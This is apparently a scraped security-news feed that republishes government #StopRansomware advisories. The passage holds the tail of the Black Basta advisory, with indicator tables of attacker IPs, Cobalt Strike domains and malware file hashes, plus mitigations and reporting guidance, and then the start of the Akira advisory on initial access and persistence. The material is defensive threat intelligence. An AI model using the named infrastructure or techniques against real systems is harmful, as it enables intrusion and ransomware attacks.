<td>fy9.36c44903529fa273afff3c9b7ef323432e223d22ae1d625c4a3957d57.015c16eff32356bf566c4fd3590c6ff9b2f6e8c587444ecbfc4bcae7.f71995aff9e6f22f8daffe9d2ad9050abc928b8f93bb0d42682fd3c3.445de2118.588027fa.dns.realbumblebee[.]net</td>
</tr>
<tr>
<td>207.126.152[.]242</td>
<td>xkpal.d6597fa.dns.blocktoday.net<br>nuher.3577125d2a75f6a277fc5714ff536c5c6af5283d928a66daad6825b9a.7aaf8bba88534e88ec89251c57b01b322c7f52c7f1a5338930ae2a50.cbb47411f60fe58f76cf79d300c03bdecfb9e83379f59d80b8494951.e10c20f77.7fcc0eb6.dns.blocktoday[.]net</td>
</tr>
<tr>
<td>72.14.196[.]50</td>
<td>.rasapool[.]net, dns.trailshop[.]net</td>
</tr>
<tr>
<td>72.14.196[.]192</td>
<td>.rasapool[.]net</td>
</tr>
<tr>
<td>72.14.196[.]2</td>
<td>.rasapool[.]net</td>
</tr>
<tr>
<td>72.14.196[.]226</td>
<td>.rasapool[.]net</td>
</tr>
<tr>
<td>46.161.27[.]151</td>
<td> </td>
</tr>
<tr>
<td>207.126.152[.]242</td>
<td>nuher.1d67bbcf4.456d87aa6.2d84dfba.dns.specialdrills[.]com</td>
</tr>
<tr>
<td>185.219.221[.]136</td>
<td> </td>
</tr>
<tr>
<td>64.176.219[.]106</td>
<td> </td>
</tr>
<tr>
<td>5.78.115[.]67</td>
<td>your-server[.]de</td>
</tr>
<tr>
<td>207.126.152[.]242</td>
<td>xkpal.1a4a64b6.dns.blocktoday[.]net</td>
</tr>
<tr>
<td>46.8.16[.]77</td>
<td> </td>
</tr>
<tr>
<td>185.7.214[.]79</td>
<td>VPN Server</td>
</tr>
<tr>
<td>185.220.100[.]240</td>
<td>Tor exit</td>
</tr>
<tr>
<td>107.189.30[.]69</td>
<td>Tor exit</td>
</tr>
<tr>
<td>5.183.130[.]92</td>
<td> </td>
</tr>
<tr>
<td>185.220.101[.]149</td>
<td>Tor exit</td>
</tr>
<tr>
<td>188.130.218[.]39</td>
<td> </td>
</tr>
<tr>
<td>188.130.137[.]181</td>
<td> </td>
</tr>
<tr>
<td>46.8.10[.]134</td>
<td> </td>
</tr>
<tr>
<td>155.138.246[.]122</td>
<td> </td>
</tr>
<tr>
<td>80.239.207[.]200</td>
<td>winklen[.]ch</td>
</tr>
<tr>
<td>183.181.86[.]147</td>
<td>Xserver[.]jp</td>
</tr>
<tr>
<td>34.149.120[.]3</td>
<td> </td>
</tr>
<tr>
<td>104.21.40[.]72</td>
<td> </td>
</tr>
<tr>
<td>34.250.161[.]149</td>
<td> </td>
</tr>
<tr>
<td>88.198.198[.]90</td>
<td>your-server[.]de; literoved[.]ru</td>
</tr>
<tr>
<td>151.101.130[.]159</td>
<td> </td>
</tr>
<tr>
<td>35.244.153[.]44</td>
<td> </td>
</tr>
<tr>
<td>35.212.86[.]55</td>
<td> </td>
</tr>
<tr>
<td>34.251.163[.]236</td>
<td> </td>
</tr>
<tr>
<td>34.160.81[.]203</td>
<td> </td>
</tr>
<tr>
<td>34.149.36[.]179</td>
<td> </td>
</tr>
<tr>
<td>104.21.26[.]145</td>
<td> </td>
</tr>
<tr>
<td>83.243.40[.]10</td>
<td> </td>
</tr>
<tr>
<td>35.227.194[.]51</td>
<td> </td>
</tr>
<tr>
<td>35.190.31[.]54</td>
<td> </td>
</tr>
<tr>
<td>34.120.190[.]48</td>
<td> </td>
</tr>
<tr>
<td>116.203.186[.]178</td>
<td> </td>
</tr>
<tr>
<td>34.160.17[.]71</td>
<td> </td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 9: File Indicators</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Filename</strong></th>
<th role="columnheader"><strong>Hash</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>C:\Users\Public\Audio\Jun.exe</td>
<td>b6a4f4097367d9c124f51154d8750ea036a812d5badde0baf9c5f183bb53dd24</td>
</tr>
<tr>
<td>C:\Users\Public\Audio\esx.zip</td>
<td> </td>
</tr>
<tr>
<td>C:\Users\Public\Audio\7zG.exe</td>
<td>f21240e0bf9f0a391d514e34d4fa24ecb997d939379d2260ebce7c693e55f061</td>
</tr>
<tr>
<td>C:\Users\Public\Audio\7z.dll</td>
<td> </td>
</tr>
<tr>
<td>C:\Users\Public\Audio\db_Usr.sql</td>
<td> </td>
</tr>
<tr>
<td>C:\Users\Public\Audio\hv2.ps1</td>
<td> </td>
</tr>
<tr>
<td>C:\Users\Public\7zG.exe</td>
<td> </td>
</tr>
<tr>
<td>C:\Users\Public\7z.dll</td>
<td> </td>
</tr>
<tr>
<td>C:\Users\Public\BitLogic.dll</td>
<td> </td>
</tr>
<tr>
<td>C:\Users\Public\NetApp.exe</td>
<td>4c897334e6391e7a2fa3cbcbf773d5a4</td>
</tr>
<tr>
<td>C:\Users\Public\DataSoft.exe</td>
<td>2642ec377c0cee3235571832cb472870</td>
</tr>
<tr>
<td>C:\Users\Public\BitData.exe</td>
<td>b3fe23dd4701ed00d79c03043b0b952e</td>
</tr>
<tr>
<td>C:\Users\Public\DigitalText.dll</td>
<td> </td>
</tr>
<tr>
<td>C:\Users\Public\GeniusMesh.exe</td>
<td> </td>
</tr>
<tr>
<td>\Device\Mup\{redacted}\C$\Users\Public\Music\PROCEXP.sys</td>
<td> </td>
</tr>
<tr>
<td>\Device\Mup\{redacted}\C$\Users\Public\Music\DumpNParse86.exe</td>
<td> </td>
</tr>
<tr>
<td>\Device\Mup\{redacted}\C$\Users\Public\Music\POSTDump.exe</td>
<td> </td>
</tr>
<tr>
<td>\Device\Mup\{redacted}\C$\Users\Public\Music\DumpNParse.exe</td>
<td> </td>
</tr>
<tr>
<td>C:\Users\Public\socksps.ps1</td>
<td> </td>
</tr>
<tr>
<td>C:\Users\Public\Thief.exe</td>
<td>034b5fe047920b2ae9493451623633b14a85176f5eea0c7aadc110ea1730ee79</td>
</tr>
<tr>
<td>C:\Users\All Users\{redacted}\GWT.ps1  C:\Program Files\MonitorIT\GWT.ps1 </td>
<td>8C68B2A794BA3D148CAE91BDF9C8D357289752A94118B5558418A36D95A5A45F</td>
</tr>
<tr>
<td>
<p>Winx86.exe </p>
<p><strong>Comment:</strong> alias for cmd.exe</p>
</td>
<td> </td>
</tr>
<tr>
<td>C:\Users\Public\eucr.exe</td>
<td>3c65da7f7bfdaf9acc6445abbedd9c4e927d37bb9e3629f34afc338058680407</td>
</tr>
<tr>
<td>C:\Windows\DS_c1.dll</td>
<td>808c96cb90b7de7792a827c6946ff48123802959635a23bf9d98478ae6a259f9</td>
</tr>
<tr>
<td>C:\Windows\DS_c1.dll</td>
<td>3a8fc07cadc08eeb8be342452636a754158403c3d4ebff379a4ae66f8298d9a6</td>
</tr>
<tr>
<td>C:\Windows\DS_c1.dll</td>
<td>4ac69411ed124da06ad66ee8bfbcea2f593b5b199a2c38496e1ee24f9d04f34a</td>
</tr>
<tr>
<td>C:\Windows\DS_c1.dll</td>
<td>819cb9bcf62be7666db5666a693524070b0df589c58309b067191b30480b0c3a</td>
</tr>
<tr>
<td>C:\Windows\DS_c1.dll</td>
<td>c26a5cb62a78c467cc6b6867c7093fbb7b1a96d92121d4d6c3f0557ef9c881e0</td>
</tr>
<tr>
<td>C:\Windows\DS_c1.dll</td>
<td>d503090431fdd99c9df3451d9b73c5737c79eda6eb80c148b8dc71e84623401f</td>
</tr>
<tr>
<td>*\instructions_read_me.txt</td>
<td> </td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 10: Known Black Basta Cobalt Strike Domains</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Domain</strong></th>
<th role="columnheader"><strong>Date/Time (UTC)/Time (UTC)</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>trailshop[.]net</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>realbumblebee[.]net</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>recentbee[.]net</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>investrealtydom[.]net</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>webnubee[.]com</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>artspathgroup[.]net</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>buyblocknow[.]com</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>currentbee[.]net</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>modernbeem[.]net</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>startupbusiness24[.]net</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>magentoengineers[.]com</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>childrensdolls[.]com</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>myfinancialexperts[.]com</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>limitedtoday[.]com</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>kekeoamigo[.]com</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>nebraska-lawyers[.]com</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>tomlawcenter[.]com</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>thesmartcloudusa[.]com</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>rasapool[.]net</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>artspathgroupe[.]net</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>specialdrills[.]com</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>thetrailbig[.]net</td>
<td>5/8/2024 6:37</td>
</tr>
<tr>
<td>consulheartinc[.]com</td>
<td>3/22/2024 15:35</td>
</tr>
<tr>
<td>otxcosmeticscare[.]com</td>
<td>3/15/2024 10:14</td>
</tr>
<tr>
<td>otxcarecosmetics[.]com</td>
<td>3/15/2024 10:14</td>
</tr>
<tr>
<td>artstrailman[.]com</td>
<td>3/15/2024 10:14</td>
</tr>
<tr>
<td>ontexcare[.]com</td>
<td>3/15/2024 10:14</td>
</tr>
<tr>
<td>trackgroup[.]net</td>
<td>3/15/2024 10:14</td>
</tr>
<tr>
<td>businessprofessionalllc[.]com</td>
<td>3/15/2024 10:14</td>
</tr>
<tr>
<td>securecloudmanage[.]com</td>
<td>3/7/2024 10:42</td>
</tr>
<tr>
<td>oneblackwood[.]com</td>
<td>3/7/2024 10:42</td>
</tr>
<tr>
<td>buygreenstudio[.]com</td>
<td>3/7/2024 10:42</td>
</tr>
<tr>
<td>startupbuss[.]com</td>
<td>3/7/2024 10:42</td>
</tr>
<tr>
<td>onedogsclub[.]com</td>
<td>3/4/2024 18:26</td>
</tr>
<tr>
<td>wipresolutions[.]com</td>
<td>3/4/2024 18:26</td>
</tr>
<tr>
<td>recentbeelive[.]com</td>
<td>3/4/2024 18:26</td>
</tr>
<tr>
<td>trailcocompany[.]com</td>
<td>3/4/2024 18:26</td>
</tr>
<tr>
<td>trailcosolutions[.]com</td>
<td>3/4/2024 18:26</td>
</tr>
<tr>
<td>artstrailreviews[.]com</td>
<td>3/4/2024 18:26</td>
</tr>
<tr>
<td>usaglobalnews[.]com</td>
<td>2/15/2024 5:56</td>
</tr>
<tr>
<td>topglobaltv[.]com</td>
<td>2/15/2024 5:56</td>
</tr>
<tr>
<td>startupmartec[.]net</td>
<td>2/15/2024 5:56</td>
</tr>
<tr>
<td>technologgies[.]com</td>
<td>1/2/2024 18:16</td>
</tr>
<tr>
<td>jenshol[.]com</td>
<td>1/2/2024 18:16</td>
</tr>
<tr>
<td>simorten[.]com</td>
<td>1/2/2024 18:16</td>
</tr>
<tr>
<td>investmentgblog[.]net</td>
<td><a>1/2/2024 18:16</a></td>
</tr>
<tr>
<td>protectionek[.]com</td>
<td>1/2/2024 18:16</td>
</tr>
</tbody>
</table>
<table>
<caption><em>Table 11: Suspected Black Basta Domains</em></caption>
<tbody>
<tr>
<td>airbusco[.]net</td>
</tr>
<tr>
<td>allcompanycenter[.]com</td>
</tr>
<tr>
<td>animalsfast[.]net</td>
</tr>
<tr>
<td>audsystemecll[.]net</td>
</tr>
<tr>
<td>auuditoe[.]com</td>
</tr>
<tr>
<td>bluenetworking[.]net</td>
</tr>
<tr>
<td>brendonline[.]com</td>
</tr>
<tr>
<td>businesforhome[.]com</td>
</tr>
<tr>
<td>caspercan[.]com</td>
</tr>
<tr>
<td>clearsystemwo[.]net</td>
</tr>
<tr>
<td>cloudworldst[.]net</td>
</tr>
<tr>
<td>constrtionfirst[.]com</td>
</tr>
<tr>
<td>erihudeg[.]com</td>
</tr>
<tr>
<td>garbagemoval[.]com</td>
</tr>
<tr>
<td>gartenlofti[.]com</td>
</tr>
<tr>
<td>getfnewsolutions[.]com</td>
</tr>
<tr>
<td>getfnewssolutions[.]com</td>
</tr>
<tr>
<td>investmendvisor[.]net</td>
</tr>
<tr>
<td>investmentrealtyhp[.]net</td>
</tr>
<tr>
<td>ionoslaba[.]com</td>
</tr>
<tr>
<td>jessvisser[.]com</td>
</tr>
<tr>
<td>karmafisker[.]com</td>
</tr>
<tr>
<td>kolinileas[.]com</td>
</tr>
<tr>
<td>maluisepaul[.]com</td>
</tr>
<tr>
<td>masterunix[.]net</td>
</tr>
<tr>
<td>monitor-websystem[.]net</td>
</tr>
<tr>
<td>monitorsystem[.]net</td>
</tr>
<tr>
<td>mytrailinvest[.]net</td>
</tr>
<tr>
<td>prettyanimals[.]net</td>
</tr>
<tr>
<td>reelsysmoona[.]net</td>
</tr>
<tr>
<td>seohomee[.]com</td>
</tr>
<tr>
<td>septcntr[.]com</td>
</tr>
<tr>
<td>softradar[.]net</td>
</tr>
<tr>
<td>startupbizaud[.]net</td>
</tr>
<tr>
<td>startuptechnologyw[.]net</td>
</tr>
<tr>
<td>steamteamdev[.]net</td>
</tr>
<tr>
<td>stockinvestlab[.]net</td>
</tr>
<tr>
<td>taskthebox[.]net</td>
</tr>
<tr>
<td>trailgroupl[.]net</td>
</tr>
<tr>
<td>treeauwin[.]net</td>
</tr>
<tr>
<td>unitedfrom[.]com</td>
</tr>
<tr>
<td>unougn[.]com</td>
</tr>
<tr>
<td>wardeli[.]com</td>
</tr>
<tr>
<td>welausystem[.]net</td>
</tr>
<tr>
<td>wellsystemte[.]net</td>
</tr>
<tr>
<td>withclier[.]com</td>
</tr>
</tbody>
</table>
<h3><strong>MITIGATIONS</strong></h3>
<p>The authoring organizations recommend all critical infrastructure organizations implement the mitigations below to improve your organization’s cybersecurity posture based on Black Basta’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p>
<ul>
<li><strong>Install updates for operating systems, software, and firmware as soon as they are released</strong> [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#MitigatingKnownVulnerabilities1E" title="Mitigating Known Vulnerabilities (1.E)">CPG 1.E</a>]. Prioritize updating <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">Known Exploited Vulnerabilities (KEV)</a>.</li>
<li><strong>Require phishing-resistant multi-factor authentication (MFA)</strong> [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#PhishingResistantMultifactorAuthenticationMFA2H" title="Phishing-Resistant Multifactor Authentication (MFA) (2.H)">CPG 2.H</a>] for as many services as possible.</li>
<li><strong>Implement recommendations, including training users to recognize and report phishing attempts </strong>[<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#BasicCybersecurityTraining2I" title="Basic Cybersecurity Training (2.I)">CPG 2.I</a>], from joint <a href="https://www.cisa.gov/resources-tools/resources/phishing-guidance-stopping-attack-cycle-phase-one" title="Phishing Guidance: Stopping the Attack Cycle at Phase One">Phishing Guidance: Stopping the Attack Cycle at Phase One</a>.</li>
<li><strong>Secure remote access software</strong> by applying mitigations from joint <a href="https://www.cisa.gov/resources-tools/resources/guide-securing-remote-access-software" title="Guide to Securing Remote Access Software">Guide to Securing Remote Access Software</a>.</li>
<li><strong>Make backups of critical systems and device configurations</strong> [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SystemBackups2R" title="System Backups (2.R)">CPG 2.R</a>] to enable devices to be repaired and restored.</li>
<li><strong>Apply mitigations from the joint </strong><a href="https://www.cisa.gov/stopransomware/ransomware-guide" title="#StopRansomware Guide"><strong>#StopRansomware Guide</strong></a>.</li>
</ul>
<p>The authoring organizations also recommend network defenders of HPH Sector and other critical infrastructure organizations to reference CISA’s <a href="https://www.cisa.gov/resources-tools/resources/mitigation-guide-healthcare-and-public-health-hph-sector" title="Mitigation Guide: Healthcare and Public Health (HPH) Sector">Mitigation Guide: Healthcare and Public Health (HPH) Sector</a> and HHS’s <a href="https://hphcyber.hhs.gov/performance-goals.html" title="HPH Cybersecurity Performance Goals">HPH Cybersecurity Performance Goals</a>, which provide best practices to combat pervasive cyber threats against organizations. Recommendations include the following:</p>
<ul>
<li><strong>Asset Management and Security</strong>: Cybersecurity professionals should identify and understand all relationships or interdependencies, functionality of each asset, what it exposes, and what software is running to ensure critical data and systems are protected appropriately. HPH Sector organizations should ensure electronic PHI (ePHI) is protected and compliant with the Health Insurance Portability and Accountability Act (HIPAA). Organizations can complete asset inventories using active scans, passive processes, or a combination of both techniques.</li>
<li><strong>Email Security and Phishing Prevention</strong>: Organizations should install modern anti-malware software and automatically update signatures where possible. For additional guidance, see CISA’s <a href="https://www.cisa.gov/resources-tools/resources/enhance-email-web-security" title="Enhance Email &amp; Web Security">Enhance Email and Web Security Guide</a>.
<ul>
<li><strong>Check for embedded or spoofed hyperlinks</strong>: Validate the URL of the link matches the text of the link itself. This can be achieved by hovering your cursor over the link to view the URL of the website to be accessed.</li>
</ul>
</li>
<li><strong>Access Management</strong>: Phishing-resistant MFA completes the same process but removes ‘people’ from the equation to help thwart social engineering scams and targeted phishing attacks that may have been successful using traditional MFA. The two main forms of phishing-resistant MFA are FIDO/Web Authentication (WebAuthn) authentication and Public Key Infrastructure (PKI)-based authentication. Prioritize phishing-resistant MFA on accounts with the highest risk, such as privileged administrative accounts on key assets. For additional information on phishing-resistant MFA, see CISA’s <a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf" title="Implementing Phishing-Resistant MFA Guide">Implementing Phishing-Resistant MFA Guide</a>.</li>
<li><strong>Vulnerability Management and Assessment</strong>: Once vulnerabilities are identified across your environment, evaluate and prioritize to appropriately deal with the posed risks according to your organization’s risk strategy. To assist with prioritization, it is essential to:
<ul>
<li><strong>Map your assets to business-critical functions.</strong> For vulnerability remediation, prioritize assets that are most critical for ongoing operations or which, if affected, could impact your organization’s business continuity, sensitive PII (or PHI) security, reputation, or financial position.</li>
<li><strong>Use threat intelligence information.</strong> For remediation, prioritize vulnerabilities actively exploited by threat actors. To assist, leverage CISA’s <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">KEV Catalog</a> and other threat intelligence feeds.</li>
<li><strong>Leverage prioritization methodologies, ratings, and scores</strong>. The Common Vulnerability Scoring System (CVSS) assesses the technical severity of vulnerabilities. The Exploit Prediction Scoring System (EPSS) measures the likelihood of exploitation and can help with deciding which vulnerabilities to prioritize. CISA’s <a href="https://www.cisa.gov/stakeholder-specific-vulnerability-categorization-ssvc" title="Stakeholder-Specific Vulnerability Categorization (SSVC)">Stakeholder-Specific Vulnerability Categorization (SSVC)</a> methodology leverages decision trees to prioritize relevant vulnerabilities into four decisions, Track, Track*, Attend, and Act based on exploitation status, technical impact, mission prevalence, and impacts to safety and public-wellbeing.</li>
</ul>
</li>
</ul>
<h3><strong>VALIDATE SECURITY CONTROLS</strong></h3>
<p>In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.</p>
<p>To get started:</p>
<ol>
<li>Select an ATT&amp;CK technique described in this advisory (see Tables 2-6).</li>
<li>Align your security technologies against the technique.</li>
<li>Test your technologies against the technique.</li>
<li>Analyze your detection and prevention technologies’ performance.</li>
<li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
<li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
</ol>
<p>The authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory.</p>
<h3><strong>REFERENCES</strong></h3>
<ol>
<li><a href="https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/" title="Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor">SentinelOne: Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor</a></li>
<li><a href="https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta" title="Ransomware Spotlight - Black Basta">Trend Micro: Ransomware Spotlight - Black Basta</a></li>
<li><a href="https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis" title="Black Basta - Technical Analysis">Kroll: Black Basta - Technical Analysis</a></li>
<li><a href="https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/black-basta" title="Who Is Black Basta?">Who Is Black Basta? (blackberry.com)</a></li>
<li><a href="https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/" title="Threat Assessment - Black Basta Ransomware">Palo Alto Networks: Threat Assessment - Black Basta Ransomware</a></li>
</ol>
<h3><strong>REPORTING</strong></h3>
<p>Your organization has no obligation to respond or provide information back to FBI in response to this joint CSA. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws.</p>
<p>FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.</p>
<p>Additional details of interest include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.</p>
<p>FBI, CISA, and HHS do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to FBI’s <a href="https://www.ic3.gov/" title="Internet Crime Complain Center">Internet Crime Complain Center (IC3)</a>, a local FBI <a href="https://www.fbi.gov/contact-us/field-offices" title="Field Offices">Field Office</a>, or CISA via the agency’s <a href="https://www.cisa.gov/forms/report" title="Incident Reporting System">Incident Reporting System</a> or its 24/7 Operations Center (<a href="mailto:report@cisa.gov" title="Report to CISA">report@cisa.gov</a> or by calling 1-844-Say-CISA [1-844-729-2472]).</p>
<h3><strong>DISCLAIMER</strong></h3>
<p>The information in this report is being provided “as is” for informational purposes only. FBI, CISA, HHS, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, HHS, and MS-ISAC.</p>
<h3><strong>VERSION HISTORY</strong></h3>
<p><strong>May 10, 2024:</strong> Initial version.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[#StopRansomware: Akira Ransomware]]></title>
<description><![CDATA[SUMMARY
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics,...]]></description>
<link>https://tsecurity.de/de/2098672/it-security-nachrichten/stopransomware-akira-ransomware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2098672/it-security-nachrichten/stopransomware-akira-ransomware/</guid>
<pubDate>Fri, 05 Apr 2024 18:05:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3><strong>SUMMARY</strong></h3>
<p><em><strong>Note: </strong>This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit </em><a href="https://www.cisa.gov/stopransomware"><em>stopransomware.gov</em></a><em> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</em></p>
<p>The United States’ Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Europol’s European Cybercrime Centre (EC3), and the Netherlands’ National Cyber Security Centre (NCSC-NL) are releasing this joint CSA to disseminate known Akira ransomware IOCs and TTPs identified through FBI investigations and trusted third party reporting as recently as February 2024.</p>
<p>Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia. In April 2023, following an initial focus on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines. As of January 1, 2024, the ransomware group has impacted over 250 organizations and claimed approximately $42 million (USD) in ransomware proceeds.</p>
<p>Early versions of the Akira ransomware variant were written in C++ and encrypted files with a <code>.akira</code> extension; however, beginning in August 2023, some Akira attacks began deploying Megazord, using Rust-based code which encrypts files with a <code>.powerranges</code> extension.  Akira threat actors have continued to use both Megazord and Akira, including Akira_v2 (identified by trusted third party investigations) interchangeably.</p>
<p>The FBI, CISA, EC3, and NCSC-NL encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.</p>
<p>Download the PDF version of this report:</p>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2024-04/aa24-109a-stopransomware-akira-ransomware.pdf" class="c-file__link" target="_blank">#StopRansomware: Akira Ransomware</a>
    <span class="c-file__size">(PDF,       586.86 KB
  )</span>
  </div>
</div>
<h3><strong>TECHNICAL DETAILS</strong></h3>
<p><strong>Note:</strong> This advisory uses the MITRE ATT&amp;CK® for Enterprise framework, version 14. See <a href="https://attack.mitre.org/versions/v14/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&amp;CK for Enterprise</a> for all referenced tactics and techniques.</p>
<h4><strong>Initial Access</strong></h4>
<p>The FBI and cybersecurity researchers have observed Akira threat actors obtaining initial access to organizations through a virtual private network (VPN) service without multifactor authentication (MFA) configured[<a href="https://www.fortinet.com/blog/threat-research/ransomware-roundup-akira" title="Ransomware Roundup - Akira">1</a>], mostly using known Cisco vulnerabilities [<a href="https://attack.mitre.org/versions/v14/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a>] <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-3259" title="CVE-2020-3259">CVE-2020-3259</a> and <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-20269" title="CVE-2023-20269">CVE-2023-20269</a>.[<a href="https://blogs.cisco.com/security/akira-ransomware-targeting-vpns-without-multi-factor-authentication" title="Akira Ransomware Targeting VPNs without Multi-Factor Authentication">2</a>],[<a href="https://www.truesec.com/hub/blog/akira-ransomware-and-exploitation-of-cisco-anyconnect-vulnerability-cve-2020-3259" title="Akira Ransomware and Exploitation of Cisco Anyconnect Vulnerability CVE-2020-3259">3</a>],[<a href="https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-akira" title="Ransomware Spotlight: Akira">4</a>] Additional methods of initial access include the use of external-facing services such as Remote Desktop Protocol (RDP) [<a href="https://attack.mitre.org/versions/v14/techniques/T1133/" title="External Remote Services">T1133</a>], spear phishing [<a href="https://attack.mitre.org/versions/v14/techniques/T1566/001/" title="Phishing: Spearphishing Attachment">T1566.001</a>][<a href="https://attack.mitre.org/versions/v14/techniques/T1566/002/" title="Phishing: Spearphishing Link">T1566.002</a>], and the abuse of valid credentials[<a href="https://attack.mitre.org/versions/v14/techniques/T1078/" title="Valid Accounts">T1078</a>].[<a href="https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-akira" title="Ransomware Spotlight: Akira">4</a>]</p>
<h4><strong>Persistence and Discovery</strong></h4>
<p>Once initial access is obtained, Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts [<a href="https://attack.mitre.org/versions/v14/techniques/T1136/002/" title="Create Account: Domain Account">T1136.002</a>] to establish persistence. In some instances, the FBI identified Akira threat actors creating an administrative account named <code>itadm</code>.</p>
